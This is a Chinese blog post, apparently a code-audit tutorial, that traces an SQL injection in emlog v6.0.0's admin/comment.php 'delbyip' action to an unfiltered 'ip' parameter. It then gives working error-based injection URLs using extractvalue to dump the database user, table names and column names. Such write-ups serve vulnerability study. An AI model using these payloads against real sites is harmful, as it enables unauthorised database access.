前几天笔者有点事情,暂停更新了,今天接着更新。
一:环境工具准备
PhpStuday。
PhpStorm。
emlog_v6.0.0
二:环境搭建
使用phpstuday进行一键搭建,路劲设置好后,会进入安装界面,按照步骤一步一步来就行。安装完成后如图。
为什么要安装完成后再进行审计呢,因为安装完和安装前的目录结构不一样,我们以安装完后为准。
三:进行审计
我们直接把项目在PhpStorm中打开,直接使用正则表达式全局搜索,但是搜出来大部分都是xxx_model.php文件,这里我去查了一下,model.php是一个用于处理与数据相关的操作的文件。那我们就看一下这些model.php文件中处理数据的写法是怎么写的,看能不能找到脆弱点入手。
一共有8个文件,我们就从第一个开始看。
打开后我们看见定义了一个getComments函数,我们先不看后面的,直接跟进这个函数,看看那里用到了。
选中,按ctrl就会出现在哪里用到了。
根据文件名字,我们看第一个comment.php文件。这里我们看到使用了getComments方法,但是也看到了intval函数。果断跑路。
通过comment这个单词的意思,这应该是一个评论留言系统,后面可能还有接收值的地方,我们慢慢往下看。这里发现了GET接收一个ip参数,并且判断是否存在,然后赋值给$ip,后面再使用函数$Comment_Model的delCommentByIp()方法,并传递$ip为参数。所以变量$ip是没有过滤的。
我们接着追踪delCommentByIp()方法,看看有没有过滤。
可以看到$ip直接被带入sql语句中了,是没有过滤的。
我们回到comment.php目录,接着看刚才的代码片段。
首先$action的值要等于delbyip。
然后检查用户Token
接着检查用户是否管理员身份,如果不是提示权限不足,并重定向到'./'目录。
构造sql注入语句,没有输出回显。所以我们可以用报错注入或者时间注入。
这里需要注意token需要放在前面,如果放在--+的后面会被注释掉。
admin/comment.php/?action=delbyip&token=37a7352817086053a064b9380bf41ac0&ip=%27and(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))%20--+
查询数据库
查询表
admin/comment.php/?action=delbyip&token=37a7352817086053a064b9380bf41ac0&ip=%27and(extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e)))%20--+
查列名
admin/comment.php/?action=delbyip&token=37a7352817086053a064b9380bf41ac0&ip=%27and(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='emlog_blog' limit 1,1),0x7e)))%20--+
最后:
世间文字八万个,唯有情字最伤人。
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
